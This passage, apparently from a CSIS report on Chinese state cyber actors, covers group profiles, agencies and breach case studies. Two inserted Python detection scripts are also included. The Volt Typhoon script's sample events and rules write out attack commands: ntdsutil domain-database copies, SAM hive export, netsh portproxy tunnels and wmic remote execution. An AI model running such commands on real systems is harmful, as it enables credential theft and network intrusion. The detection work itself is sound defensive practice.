- In March 2024, Judgment Panda launched a sweeping cyber espionage campaign targeting “millions of people” worldwide. Although the primary targets were individuals critical of Beijing, Reuters also uncovered evidence of trade secret theft, suggesting a potential element of opportunism. The targets included “White House staffers, U.S. senators, British parliamentarians, and government officials.” The breach is also believed to have compromised the work accounts, personal emails, and phone records of “millions of Americans.” According to then-Deputy U.S. Attorney General Lisa Monaco, the hack aimed to “repress critics of the Chinese regime, compromise government institutions, and steal trade secrets.”
GOTHIC PANDA
▲ Table 9: Aliases of Gothic Panda
Gothic Panda has been active since 2007 and is believed to be affiliated with the Guangdong State Security Department (GSSD). Gothic Panda is believed to operate out of Guangzhou Boyu Information Technology Company, Ltd. (“Boyusec”), a front company posing as a cybersecurity firm but affiliated with the GSSD and the Guangdong Provincial Information Security Assessment Center, a government bureau that “conducts security assessments of software.”
According to the USCC, the group targets organizations in the “aerospace, defense, construction, engineering, high-technology, telecommunications, and transportation sectors.” Winnona DeSombre of Harvard University’s Belfer Center noted that Gothic Panda has also been known to observe and reverse engineer U.S. hacking tools allegedly used against Chinese systems. This may explain why the group was found using NSA-developed hacking tools and artifacts a full year before these capabilities were made public in the 2016 Shadow Brokers leak. Gothic Panda previously used phishing emails and zero-day exploits in browsers such as Internet Explorer and Firefox and in the now-discontinued Adobe Flash Player. The group is also known to deploy malware like SHOTPUT, COOKIECUTTER, and SOGU.
The group is responsible for the following notable cyberattack:
- In November 2017, DOJ charged three hackers, allegedly belonging to Gothic Panda, for sending spear-phishing emails containing malicious attachments and links to employees at Trimble, Siemens, and Moody’s Analytics. These attacks were carried out between 2011 and 2017 and stole trade secrets.
ETHEREAL PANDA
▲ Table 10: Aliases of Ethereal Panda
Ethereal Panda has been active since 2021 and is known for targeting “government agencies and education, critical manufacturing, and information technology organizations,” mostly in Taiwan. The group has also hacked organizations in Southeast Asia, North America, and Africa. According to Recorded Future, Ethereal Panda operates out of Fuzhou, a city whose MSS branch focuses on gathering intelligence on Taiwan. However, since Fuzhou is within the PLA’s Eastern Theater Command, which also focuses on Taiwan, some speculate that Ethereal Panda may instead be affiliated with the PLA rather than the MSS, though this remains difficult to confirm.
According to Microsoft, Ethereal Panda uses LOTL techniques to “quietly remain in [organizations’] networks” for extended periods, similar to Volt Typhoon. However, unlike Volt Typhoon, which mostly targets internet routers, Ethereal Panda exploits vulnerabilities in public-facing servers and Internet of Things devices such as “cameras, video recorders and storage devices.” The group then uses LOTL methods to maintain persistence and exfiltrate credentials from victims’ networks. Ethereal Panda’s focus on Taiwan is noteworthy, as it shares many attributes with Volt Typhoon, such as its extensive use of LOTL techniques to remain covertly embedded in systems for extended periods of time. Consequently, like Volt Typhoon, Ethereal Panda could be positioning itself within Taiwan’s systems to potentially disrupt critical infrastructure in the event of a full-scale Chinese invasion of the island. If true, this would make Ethereal Panda the Taiwan equivalent of Volt Typhoon, which targets U.S. critical infrastructure. In addition to targeting Taiwan, the group has also hacked organizations in countries such as Djibouti, Kenya, Rwanda, Hong Kong, Malaysia, the Philippines, and South Korea.
The group is responsible for the following notable cyberattack:
- In June 2024, Insikt Group, Recorded Future’s threat research division, identified Ethereal Panda as responsible for hacking government organizations in Taiwan, Laos, Kenya, and Rwanda. The attacks, which took place between November 2023 and April 2024, targeted “70 Taiwanese organizations in the academic, government, think tank, and technology sectors,” as well as three Taiwanese universities and de facto embassies. The group is also believed to have stolen 1.7 terabytes of sensitive data from Taiwanese telecom giant Chunghwa Telecom, including government contacts and files from the Taiwanese armed forces, foreign ministry, and coast guard. Insikt Group suggests that Ethereal Panda exploited vulnerabilities in Linux operating systems to carry out these attacks.
SALT TYPHOON
▲ Table 11: Aliases of Salt Typhoon
Salt Typhoon has been active since at least 2019 and is known for targeting numerous telecommunications companies as well as high-profile individuals in the 2024 U.S. presidential election. Initially focused on organizations in Southeast Asia, the group has since expanded its operations globally, targeting industries such as hospitality, engineering, and law in Brazil, Burkina Faso, Canada, France, Guatemala, Israel, Lithuania, Saudi Arabia, South Africa, Taiwan, Thailand, and the United Kingdom. Salt Typhoon is likely an arm of the MSS, and its operations are believed to focus on intelligence gathering.
The group is known for exploiting ProxyLogon vulnerabilities in Microsoft Exchange Server (including CVE-2021-26855) and for using the Demodex rootkit. In its most recent breaches of U.S. telecommunications companies in September 2024 (described below), the group is suspected of exploiting vulnerabilities in Cisco internet routers, though this has yet to be confirmed.
The group is responsible for the following notable cyberattack:
- On September 26, 2024, hackers believed to be part of Salt Typhoon successfully gained access to the networks of cable and broadband providers, enabling them to retrieve data stored by U.S. telecommunications companies. The affected companies include AT&T, Lumen Technologies, T-Mobile, and Verizon. While some speculate that the group exploited vulnerabilities in Cisco internet routers to achieve this access, this has not been confirmed. The campaign also allowed the group access to the communications of U.S. officials and candidates, including then-presidential candidate Donald Trump, then-vice presidential candidate JD Vance, and the campaign staff of then-Vice President Kamala Harris. According to the Washington Post, Salt Typhoon was able to “listen in on audio calls in real time”—data that is highly valuable to Chinese intelligence agencies. The group reportedly had access to this system for “months” and appeared to be collecting intelligence, according to the Wall Street Journal.
MINISTRY OF PUBLIC SECURITY (MPS)
The MPS is responsible for overseeing China’s public security, including domestic surveillance and cybersecurity. Similar to the MSS, the MPS has a provincial-level Public Security Bureau in “each province, autonomous region, and municipality directly under the central government.” The MPS plays a key role in China’s cybersecurity infrastructure, and its powers were significantly expanded under the 2017 National Cybersecurity Law (CSL). Under the CSL, the MPS is designated as one of the agencies responsible for “cybersecurity protection, supervision, and management” and has since incorporated cyber into its already broad mandate of “investigating matters in public and internal security.” Additionally, the MPS is tasked with “punishing actors that violate the [2017] CSL,” giving it significant autonomy and authority to monitor and inspect domestic cyber and network systems, as well as foreign companies operating in China. For example, as of 2018, the MPS has the power to “conduct on-site and remote inspections of any company with five or more computers connected to the internet”—a broad definition that effectively includes almost every foreign company operating in China. During these inspections, the MPS can “copy user information, log security response plans during on-site inspections, and check for vulnerabilities.” According to The Record, this information can also be used by state surveillance or security agencies “to monitor a company’s inner workings as well as its customers.”
The MPS is further permitted to involve third-party “cybersecurity service agencies” in remote inspections, allowing it to enforce China’s censorship laws under the guise of network security. Additionally, according to the USCC, the PLA “may call up personnel within . . . the MSS and MPS to participate in cyberwarfare missions on an ad hoc basis.” However, little information is available about these arrangements, though it is likely that both the MPS and MSS would “have operational roles during a conflict.”
According to Sekoia.io, a primary purpose of the MPS is to combat the “five poisons” to maintain internal security. These include democracy advocates, Taiwan, Tibetans, Uyghurs, and Falun Gong—a domestic religious and spiritual movement that the CCP perceives as a threat. The MPS’s classification of these groups as threats to internal security could explain its activities beyond China’s borders, including harassment campaigns targeting dissidents living abroad, often linked to the MPS’s United Front Work, as well as cyber influence operations conducted by its 912 Special Working Group.
While there are very few publicly known cyber-related units within the MPS, notable examples include the aforementioned 912 Special Working Group and the MPS’s First Research Institute. The 912 group is responsible for influence operations and uses thousands of fake social media accounts to target Chinese dissidents and pro-democracy activists living abroad. For example, in its April 2023 indictment, DOJ charged 40 MPS officers—many suspected of belonging to the 912 Special Working Group—and two CAC officials for perpetrating “transnational repression schemes targeting U.S. residents.”
The First Research Institute “supports the operational elements of the MPS” and has been known to post programming job vacancies on EvilOctal.com and XFOcus.net—two large online hacker communities—likely to recruit talent and “build consulting relationships.” For example, Peng Yinan, the founder of Chinese hacker group Javaphile (who breached the White House website in 2001) maintains a “formal consulting relationship” with the Shanghai Public Security Bureau, the city’s municipal branch of the MPS. However, aside from these examples, researchers were unable to identify other publicly known MPS-affiliated cyber units, institutes, or hacker groups for this report, though they likely exist.
CYBERSPACE ADMINISTRATION OF CHINA (CAC)
The CAC is China’s central internet regulator and its primary agency for control, oversight, and censorship. The CAC originates from the CCP’s propaganda system and operates under the Central Cyberspace Affairs Commission (which itself falls under the CCP Central Committee). Since 2018, the CAC has operated under the Office of the Central Cyberspace Affairs Commission (CCAC). However, some sources suggest that the CCAC and CAC may refer to the same entity, with the CAC serving as its public regulatory-body name. In 2017, the CAC released a policy document directing “the deepened development of military-civilian integration for cybersecurity and informatisation,” further strengthening ties between the PLA and Huawei, China’s telecommunications giant.
The CAC oversees administrative licensing and regulation and “represents China in international cyber-related activities.” According to Thomson Reuters, the CAC is also “in charge of cyberspace security and internet content regulation” and is responsible for “directing, coordinating and supervising online content management and handling administrative approval of businesses related to online news reporting.” Stanford University’s DigiChina Project notes that the CAC “lacks many formal attributes of an administrative agency,” notably “institutional transparency and accountability,” making it an especially powerful regulatory body. Similarly, the CAC’s original mandate to “manage and enforce requirements for online content” has expanded significantly in recent years and now encompasses “policy and regulation on cybersecurity, data security, and privacy,” according to the DigiChina Project. Consequently, the CAC functions much like a “supra-ministerial regulator,” with authority over “all state and private sectors touched by . . . online activity.”
This broad jurisdiction was notably demonstrated in its surprise 2021 crackdown on DiDi Global, a Chinese ride-sharing company that went public in June 2021 through an initial public offering (IPO) on the New York Stock Exchange. Immediately after the IPO, the CAC launched a comprehensive cybersecurity review of the company, ordered that DiDi’s apps be removed from Chinese online stores for “illegally collecting personal information,” and fined the company $1.2 billion for violating “cybersecurity, data security, and personal information protection laws.” The exact reasons for the CAC’s intense scrutiny of DiDi remain unclear. Some speculate that DiDi may have angered the CAC by proceeding with its U.S. IPO despite the agency’s request for a delay. Others suggest the move was politically motivated rather than security-driven or that DiDi’s frequent rule-bending became a problem, though the specific political objectives remain unclear.
Public/Private
NONGOVERNMENTAL ACTORS
- National Cybersecurity Center
One step removed from the government are organizations like the National Cybersecurity Center, which houses multiple research and talent centers, laboratories, and an operational national cybersecurity school. Two of its labs, the Combined Cybersecurity Research Institute and the Offense-Defense Lab, conduct cybersecurity research for the Chinese government. Furthermore, in 2017, China established the Central Commission for Integrated Military and Civilian Development within the 360 Enterprise Security Group—one of China’s most prominent cybersecurity companies—with the aim of “enhancing private sector cooperation” with the PLA and furthering its cyber warfare capabilities. China has also called on private entities for certain tasks, though this area is thinly studied. This project will attempt to identify trends in China’s use of ostensibly private entities for developing accesses and conducting offensive operations in the cyber domain.
- Patriotic Hackers and Hacktivists
China is home to a large array of patriotic hackers, primarily from the private sector. These hackers first gained notoriety for defacing U.S. government websites in response to the accidental 1999 bombing of the Chinese embassy in Belgrade, marking the first documented cyber operation by actors based in China against the United States. However, since 2015, the central government has gradually tightened its control over these groups, which now largely operate under the loose supervision of intelligence officers and primarily focus on surveillance and espionage rather than incendiary offensive cyber operations.
China also employs more independent, less supervised cyber volunteers known as hacktivists. This group consists primarily of malware developers and security researchers who engage in large-scale, politically motivated cyber operations such as DDoS attacks, foreign network defacement, and data destruction. Hacktivist activity often includes high-profile cyberattacks on Taiwan in response to specific events. For instance, immediately before then-U.S. Speaker of the House Nancy Pelosi’s visit to Taiwan in August 2022, Chinese hacktivists hit the websites of then-Taiwanese President Tsai Ing-wen, the National Defense Ministry, the Foreign Affairs Ministry, and the Taiwan Taoyuan International Airport, the island’s largest airport, with DDoS attacks. Some 7-Eleven convenience store television screens were also hacked, displaying the message: “Warmonger Pelosi, get out of Taiwan!” Since these attacks were ostensibly carried out by independent hackers, Beijing could deny involvement, but it is likely that Beijing played some role in enabling these activities or, at the very least, turned a blind eye to them.
To strengthen its hacker network, China frequently also hires individuals as contractors for offensive cyber tasks or recruits them into information security roles and programming positions affiliated with the MSS or MPS. As with MSS-affiliated front companies, the blurred line between Chinese government actors and state-sponsored actors makes it especially challenging for outside countries to attribute responsibility for the actions of these patriotic hackers and hacktivists. According to Amy Chang of the Center for a New American Security (CNAS), the Chinese government uses non-state actors to “credibly signal coercive threats” on its behalf, targeting countries with which the CCP has conflicts or disagreements. This assessment is supported by researcher Jeffrey Kwong, who found a recurring pattern in which official threats issued by the Chinese government against a country are often followed by cyberattacks carried out by Chinese hacktivist groups.
However, Kwong also notes that many of these hacktivist groups are relatively “uncontrolled and more nationalistic than the state,” posing a “risk of domestic unrest” if the Chinese government retreats from its threats. Ultranationalist hacktivist groups have even launched cyberattacks against the Chinese state to “express displeasure” about perceived CCP restraint, which also often “coincide with periods of discontent with the CCP.” For example, in 2014, a hacktivist group hijacked the state television network in Wenzhou to broadcast “nationalistic and anti-CCP messages,” likely in protest against the detention of Wang Bingzhang, a nationalist activist.
Case Studies
Case Study 1: The Great Sucking Sound: Data Leaves in Droves
China has been highly effective at stealing massive amounts of data. Since 2014, China has hacked and stolen the data of about 80 percent of Americans. In the attack that year on the health insurance company Anthem, China exfiltrated an estimated 79 million member names, birth dates, Social Security numbers, and highly sensitive personally identifiable information. The same year, China’s hack of OPM compromised 21.5 million personnel records. Millions more records followed in the 2016 hack of Starwood Hotels and in the 2017 hack of Equifax. Data at this scale is helpful for a range of uses, including training AI models, identifying vulnerabilities among people with security clearances, and informing potential influence campaigns.
Some of these hacks have involved hoovering up data seemingly indiscriminately, but four instances in particular suggest a campaign to create a constellation of highly useful data. The first occurred on February 18, 2014, when the Chinese state-backed group Deep Panda sent an Anthem employee a phishing email carrying malware. Once the employee opened it, the malware ran on the workstation, giving the attackers a foothold from which they moved laterally through Anthem's networks, ultimately gaining access to "over 50 employee accounts and 90 different systems." Among these systems was Anthem's data warehouse, which stored records for "millions" of Anthem members. From February to December 2014, the group exfiltrated approximately 78.8 million member records, including names, birthdates, Social Security numbers, email addresses, home addresses, and patient financial data. It was not until January 27, 2015, that Anthem discovered the breach and notified law enforcement. By then, the damage was done. The 2014 Anthem hack remains the largest known cyber incident in the U.S. healthcare industry.
What makes the Anthem hack even more notable is that the malware used in the initial breach was likely developed by Chinese university students only a few months prior. ThreatConnect was able to trace the IP address embedded in the Anthem malware back to the 2014 TOPSEC Cup, a student hacking competition sponsored by Southeast University’s Information Security Research Center in Nanjing and the Beijing Topsec Network Security Technology Company, a defense contractor partially funded by the PLA. The competition, which reportedly awarded an internship at Beijing Topsec as the final prize, is believed to have awarded points to students for hacking real targets inside the United States. Deep Panda hackers are believed to have modified malware developed in this competition for their breach of Anthem. Southeast University is also known for connecting promising students to jobs in government security services and “research positions,” drawing from a consistent pipeline of young talent for the MSS.
The second incident occurred concurrently with the 2014 Anthem hack, when the same APT, Deep Panda, is also believed to have breached OPM. According to CSO Online, this breach began when the group successfully compromised the systems of USIS and KeyPoint, two U.S. government contractors that were conducting background checks on government employees with “access to OPM servers.” These initial breaches trace back to December 2013; however, OPM officials did not detect the breach until March 2014. Notably, because OPM officials determined that the hackers were “confined to a part of the network that didn’t have any personnel data,” they chose not to immediately expel the hackers, opting instead to monitor their activity to gather counterintelligence. According to a report by the House Committee on Oversight and Government Reform, OPM planned a “Big Bang” system reset to expel the hackers on May 27, 2014. However, by this time, Deep Panda had already used stolen credentials from its earlier KeyPoint hack to establish a secondary, hidden foothold within OPM’s network and create a backdoor. After the May 27 reset, Deep Panda retained access to OPM’s networks, quietly exfiltrating data from July to October 2014. By October, the group had used OPM’s compromised network to breach the Department of the Interior’s servers, which contained millions of U.S. government personnel records. This continued through December 2014, resulting in the exfiltration of an additional 4.2 million personnel records. By March 2015, federal personnel fingerprint data had also been compromised.
Overall, the OPM breach resulted in the theft of 21.5 million records, including some of the most sensitive data, such as “millions” of SF-86 forms, which contain personal background check information for individuals seeking U.S. government security clearances, including details on “past drug use, financial history, mental health history and personal relationships,” as well as information about their friends, family members, known associates, and contacts abroad. The breach also compromised the fingerprints of 5.6 million federal employees and the information of 3.6 million current and former government employees. According to a July 2015 OPM statement, “If an individual underwent a background investigation through OPM in 2000 or afterwards . . . it is highly likely that the individual is impacted by this cyber breach.”
Since these two major attacks, China has also been implicated in other high-profile breaches, though it remains unclear whether the same APT, Deep Panda, was responsible. Hackers compromised Starwood Hotels' reservation system in an intrusion that began in 2014 and was disclosed by Marriott in 2018, two years after it acquired Starwood; the breach exposed reservation data, including credit card and passport information, for up to approximately 500 million guests. In 2017, Beijing's hackers broke into Equifax, a credit reporting agency, and stole the financial information of approximately 148 million Americans, including hundreds of thousands of credit card numbers and credit dispute documents. This combination of data is highly valuable to Beijing: it can help identify U.S. government employees with security clearances who have financial or health problems, track their past and upcoming travel, and create opportunities for recruitment.
Case Study 2: Exchange Hack
From January to March 2021, hackers associated with the HAFNIUM group (possibly Kryptonite Panda) conducted a rapid and audacious campaign of data exfiltration. As early as January 3, 2021, the hackers began conducting cyber espionage operations against on-premises Microsoft Exchange servers. In February, attacks spread globally.
In early March, Microsoft publicly confirmed that attackers were exploiting several previously unknown vulnerabilities in on-premises Exchange Server (the chain later dubbed ProxyLogon) and, on March 2, released out-of-band patches a week ahead of its regular release schedule (March 9, or "Patch Tuesday"). CISA followed on March 3 with Emergency Directive 21-02, instructing all Federal Civilian Executive Branch agencies to "immediately disconnect Microsoft Exchange on-premises servers" and conduct incident response procedures. Once the fix was public, the pace changed: attacks increased sharply between Friday, March 5, and Monday, March 8, as operators raced to compromise servers before administrators could patch them, and Chinese operators began to exfiltrate huge amounts of information, particularly email. According to Tom Burt, Microsoft's then-corporate vice president for security and trust, Microsoft saw attacks grow from "hundreds a day . . . [to] north of several thousand a day." Security researchers eventually assessed that China breached more than 30,000 servers in the United States and hundreds of thousands worldwide.
This attack showed the power of a hybrid approach, where skilled government hackers quietly capitalized on the vulnerability. However, as soon as Beijing saw Microsoft ready to patch, a huge number of attackers apparently joined the operation. To what end is unclear: that much data may or may not ever be fully exploited and useful, but one potential use might be to train AI large language models.
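A hunting check for the pre-authentication server-side request forgery at the start of the Exchange chain (CVE-2021-26855), as an added example that is not code from the report or from Microsoft: it reads Exchange front-end HttpProxy logs and flags anonymous requests whose AnchorMailbox or BackEndCookie carries a path, the indicator Microsoft's published Test-ProxyLogon script looks for. The column names follow that script's queries; the log rows, host names and client addresses are constructed for illustration.

```python
"""Triage Exchange HttpProxy logs for the CVE-2021-26855 SSRF pattern.

Added example; not from the CSIS report or from Microsoft. Column names follow
Microsoft's published Test-ProxyLogon hunting queries. The sample rows below
are constructed (real logs have dozens of columns; only those the rules read
are kept).
"""
from __future__ import annotations

import csv
import io
from dataclasses import dataclass

# Constructed sample of an Exchange front-end HttpProxy log, one request per row.
SAMPLE_HTTPPROXY_LOG = """DateTime,UrlStem,AuthenticatedUser,AnonymousRequest,AnchorMailbox,BackEndCookie,ClientIpAddress,UserAgent
2021-03-02T08:11:02.120Z,/owa/auth/logon.aspx,,True,,,203.0.113.8,Mozilla/5.0
2021-03-02T08:12:44.501Z,/ews/exchange.asmx,corp\\alice,False,Sid~S-1-5-21-1,Server~EX01.corp.local~1,10.0.4.21,Microsoft Office/16.0
2021-03-02T08:13:10.334Z,/owa/auth/Current/themes/resources/logon.css,,True,ServerInfo~EX01.corp.local/autodiscover/autodiscover.xml?#,,198.51.100.23,python-requests/2.25.1
2021-03-02T08:13:11.902Z,/ecp/y.js,,True,ServerInfo~EX01.corp.local/ecp/proxyLogon.ecp?#,Server~EX01.corp.local/ecp/proxyLogon.ecp~1,198.51.100.23,python-requests/2.25.1
2021-03-02T08:15:00.004Z,/mapi/emsmdb/,corp\\bob,False,Sid~S-1-5-21-2,Server~EX01.corp.local~1,10.0.4.37,Microsoft Office/16.0
"""


@dataclass(frozen=True)
class Hit:
    when: str
    client_ip: str
    url: str
    reason: str


def is_ssrf_anchor(anchor: str) -> bool:
    """An unauthenticated request should never steer routing with a
    'ServerInfo~host/path' anchor; legitimate anchors are Sid~/Smtp~ forms."""
    return anchor.startswith("ServerInfo~") and "/" in anchor


def is_ssrf_cookie(cookie: str) -> bool:
    """Legitimate BackEndCookie values look like 'Server~host~version' with no
    path; a path component means the client chose where the front end proxied."""
    if not cookie.startswith("Server~"):
        return False
    body = cookie[len("Server~"):]
    return "/" in body and "~" in body.split("/", 1)[1]


def triage(log_text: str) -> list[Hit]:
    """Return the unauthenticated requests that show either SSRF indicator."""
    hits: list[Hit] = []
    for row in csv.DictReader(io.StringIO(log_text)):
        unauthenticated = (
            row["AuthenticatedUser"] == "" and row["AnonymousRequest"] == "True"
        )
        reasons = []
        if is_ssrf_anchor(row["AnchorMailbox"]):
            reasons.append("AnchorMailbox is ServerInfo~host/path")
        if is_ssrf_cookie(row["BackEndCookie"]):
            reasons.append("BackEndCookie carries a path")
        # The bug is pre-auth, so only anonymous requests are in scope here; an
        # authenticated user steering the anchor is a separate investigation.
        if unauthenticated and reasons:
            hits.append(
                Hit(row["DateTime"], row["ClientIpAddress"], row["UrlStem"], "; ".join(reasons))
            )
    return hits


def suspicious_sources(log_text: str) -> list[str]:
    """Distinct client addresses to pivot on (web shells, outbound transfers)."""
    return sorted({h.client_ip for h in triage(log_text)})


if __name__ == "__main__":
    for hit in triage(SAMPLE_HTTPPROXY_LOG):
        print(f"{hit.when} {hit.client_ip} {hit.url}: {hit.reason}")
    print("pivot on:", suspicious_sources(SAMPLE_HTTPPROXY_LOG))
```

A hit here is a starting point, not a verdict: the next steps are to check the ECP server logs for the OAB virtual directory writes that dropped web shells, look for new .aspx files under the Exchange web roots, and treat the flagged client addresses as pivots for outbound mail exports. Hunting the logs mattered in March 2021 precisely because patching did not remove web shells already planted.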
Case Study 3: Volt Typhoon
In late 2023 and throughout 2024, U.S. entities revealed a Chinese effort to compromise critical infrastructure in the mainland United States and Guam. The attacks produced little to no intelligence value; instead, they seemed designed to hold U.S. infrastructure at risk of outage at a time of China’s choosing.
In December 2023, Lumen Technologies' Black Lotus Labs uncovered the KV-botnet, a botnet likely operated by Volt Typhoon. According to the Department of Justice's January 2024 announcement of a court-authorized operation to disrupt it, most of the compromised devices were Cisco and NetGear small office/home office (SOHO) routers that had reached "end of life" status, meaning they no longer received security patches or updates. Volt Typhoon used these routers, along with compromised firewalls and VPN appliances, as proxy infrastructure, so that its traffic into victim networks blended with ordinary residential and small-business internet activity. Inside those networks it relied on living-off-the-land (LOTL) techniques, using built-in administrative tools and valid credentials rather than custom malware, which leaves few artifacts for signature-based defenses to catch.
Volt Typhoon embedded itself in the networks of "aviation, rail, mass transit, highway, maritime, pipeline, water and sewage organizations." Earlier intrusions breached internet-facing servers at the Port of Houston, the largest U.S. port by total annual tonnage, in September 2021, as well as the two largest telecommunications providers in Guam. Chinese intrusions into U.S. critical infrastructure likely predate 2021: intrusions into the systems of U.S. oil and natural gas pipeline operators were detected between December 2011 and 2013. However, CISA has not formally attributed those breaches to a specific APT, and there is no indication that they were the work of Volt Typhoon.
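Because Volt Typhoon relies on built-in Windows tooling rather than malware, detection comes down to process-creation telemetry and context: which account ran which administrative tool on which host. The following added example (not code from the report, CISA or Microsoft) triages constructed process-creation events against command-line patterns of the kind listed in the joint CISA/NSA/FBI advisory on Volt Typhoon (ntdsutil IFM copies of NTDS.dit, netsh portproxy tunnels, WMI remote execution, admin-share listing) and separates expected administrative use from activity that warrants investigation. The host names, accounts and the allow-list of expected use are assumptions.

```python
"""Triage Windows process-creation events for living-off-the-land activity.

Added example; not from the CSIS report, CISA or Microsoft. The command-line
patterns are of the kind published in the joint advisory on Volt Typhoon; the
events, host names, accounts and allow-list below are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    user: str
    parent: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str  # MITRE ATT&CK technique ID
    host: str
    user: str
    verdict: str  # "expected" or "investigate"
    cmdline: str


# (rule name, ATT&CK technique, pattern over the full command line)
RULES = [
    ("ntds_ifm_dump", "T1003.003", re.compile(r"ntdsutil(\.exe)?\b.*\bifm\b", re.I)),
    ("sam_hive_export", "T1003.002", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|security|system)\b", re.I)),
    ("netsh_portproxy", "T1090.001", re.compile(r"netsh(\.exe)?\s+interface\s+portproxy\s+add\b", re.I)),
    ("wmic_remote_exec", "T1047", re.compile(r"wmic(\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)),
    ("admin_share_listing", "T1021.002", re.compile(r"\bdir\s+\\\\[\w.-]+\\[a-z]\$", re.I)),
]

# Assumed allow-list: (host, account) pairs for which a rule is normal. The
# tools are legitimate, so the decision has to be made on context, not on the
# binary name alone. Everything not listed is treated as needing a look.
ALLOWED: dict[str, set[tuple[str, str]]] = {
    "ntds_ifm_dump": {("DC01", "CORP\\svc_adbackup")},
}

# Constructed sample telemetry (Security 4688 / Sysmon 1 style fields).
SAMPLE_EVENTS = [
    ProcEvent("DC01", "CORP\\svc_adbackup", r"C:\Program Files\Backup\agent.exe",
              r'ntdsutil.exe "ac i ntds" "ifm" "create full D:\backup\ifm" q q'),
    ProcEvent("FS02", "CORP\\jsmith", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c ntdsutil "ac i ntds" ifm "create full C:\Windows\Temp\pro" q q'),
    ProcEvent("FS02", "CORP\\jsmith", r"C:\Windows\System32\cmd.exe",
              "netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 "
              "connectport=8443 connectaddress=10.0.9.5"),
    ProcEvent("WS17", "CORP\\alice", r"C:\Windows\explorer.exe",
              r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n'),
    ProcEvent("FS02", "CORP\\jsmith", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c dir \\10.0.4.21\c$\Users"),
    ProcEvent("WS17", "CORP\\alice", r"C:\Windows\System32\cmd.exe",
              "netsh interface show interface"),
    ProcEvent("FS02", "CORP\\jsmith", r"C:\Windows\System32\cmd.exe",
              r'wmic /node:10.0.4.21 /user:CORP\jsmith process call create '
              r'"cmd.exe /c netstat -ano > C:\Windows\Temp\n.txt"'),
]


def verdict(rule: str, ev: ProcEvent) -> str:
    expected = {(h.upper(), u.upper()) for h, u in ALLOWED.get(rule, set())}
    return "expected" if (ev.host.upper(), ev.user.upper()) in expected else "investigate"


def triage(events: list[ProcEvent]) -> list[Finding]:
    """Match every event against every rule; one finding per (event, rule)."""
    findings: list[Finding] = []
    for ev in events:
        for rule, technique, pattern in RULES:
            if pattern.search(ev.cmdline):
                findings.append(Finding(rule, technique, ev.host, ev.user,
                                        verdict(rule, ev), ev.cmdline))
    return findings


def hosts_to_investigate(events: list[ProcEvent]) -> list[str]:
    """Hosts with at least one finding outside the allow-list."""
    return sorted({f.host for f in triage(events) if f.verdict == "investigate"})


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.verdict:11}] {f.rule:20} {f.technique:9} {f.host} {f.user}: {f.cmdline}")
    print("investigate:", hosts_to_investigate(SAMPLE_EVENTS))
```

The allow-list is the important part. Every tool above has a legitimate use, so a rule that fires on the binary alone drowns analysts in backup jobs and help-desk sessions; the Volt Typhoon pattern is the same command run by an interactive user account on a file server that has no business exporting the domain database. Baselining who runs what, and where, is what makes LOTL activity visible at all.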
▲ Figure 3: Volt Typhoon Attack Diagram. Source: Microsoft Threat Intelligence, “Volt Typhoon Targets US Critical Infrastructure with Living-off-the-Land Techniques,” Microsoft Security (blog), Microsoft, May 24, 2023.
China’s true agenda is almost certainly sabotage. According to Microsoft, Volt Typhoon is developing capabilities that could “disrupt critical communications infrastructure between the United States and Asia during future crises.” CISA has noted that most of Volt Typhoon’s identified targets, such as mass transit systems or water treatment facilities, “have no legitimate espionage value.” Harry Coker, at the time serving as national cyber director, warned that Volt Typhoon’s efforts are designed to “disrupt [the U.S.] military’s ability to mobilize,” while then-FBI Director Christopher Wray stated that the group is preparing to “wreak havoc and cause real-world harm to American citizens and communities if and when China decides the time has come to strike.”
Similarly, the 2024 Annual Threat Assessment of the U.S. Intelligence Community indicates that if China perceives an “imminent” conflict with the United States, it might consider launching “aggressive cyber operations against U.S. critical infrastructure and military assets . . . [to] deter U.S. military action, . . . impede U.S. decisionmaking, induce societal panic, and interfere with the deployment of U.S. forces.” U.S. authorities have also found “software tools left behind that could be used to destroy infrastructure components,” warning that if the United States “go[es] to war with [China], they will try to turn them on.” A compromise of critical infrastructure around U.S. military bases, such as power grids or water treatment facilities, could slow U.S. mobilization and buy China enough time to blockade Taiwan. Even a 24-hour delay in the U.S. response could shift the balance in China’s favor and secure its control over the island.
The length of time Volt Typhoon has managed to remain covertly embedded within U.S. critical infrastructure is also a serious concern. According to The Guardian, intelligence officials estimate that Volt Typhoon has “maintain[ed] access and footholds” in U.S. systems for as long as five years. As early as 2009, U.S. intelligence officials observed China attempting to “map [U.S.] infrastructure,” including electrical grids.
Aosheng Pusztaszeri is a research assistant with the Intelligence, National Security, and Technology (INT) Program at CSIS, where he focuses on emerging technologies and their implications for national security. Prior to joining CSIS, Aosheng interned in the U.S. Senate and the U.S. House of Representatives and worked as an undergraduate research assistant in Cornell University’s Department of Government.
Emily Harding is director of the Intelligence, National Security, and Technology (INT) Program and vice president of the Defense and Security Department at CSIS. As the head of the INT Program, she provides thought leadership on the most critical issues facing intelligence professionals and on the future of intelligence work. She also serves as vice president of the Defense and Security Department, where she is responsible for leading a team of world-renowned scholars providing policy solutions that shape national security. Drawing on her decades of experience in national security, Emily has established herself as an expert on how technology is revolutionizing national security work. Harding has served in a series of high-profile national security positions at critical moments.
Julia Dickson is a research associate with the Intelligence, National Security, and Technology (INT) Program at CSIS. Her research interests include cybersecurity and cybercrime and the role of technology in conflict. Prior to joining CSIS, she was awarded a Fulbright grant and spent a year teaching English in Osh, Kyrgyzstan. She was also previously a research assistant at the Wilson Center, an intern for the Conventional Defense Program at the Stimson Center, and a communications and outreach intern at the International Crisis Group.